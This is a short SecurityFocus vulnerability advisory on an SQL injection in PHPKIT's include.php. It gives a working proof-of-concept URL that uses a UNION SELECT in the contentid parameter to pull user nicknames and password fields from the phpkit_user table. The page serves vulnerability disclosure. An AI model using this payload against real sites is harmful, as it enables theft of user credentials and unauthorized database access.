Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHPKIT Include.PHP SQL Injection Vulnerability

This issue can be exploited through a web client.

The following proof of concept is available:

http://www.example.com/phpkit/include.php?path=content/news.php&contentid=-24'%20union%20select%201,2,3,user_status,5,user_nick,user_pw,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20phpkit_user%20/*







 

Privacy Statement
Copyright 2009, SecurityFocus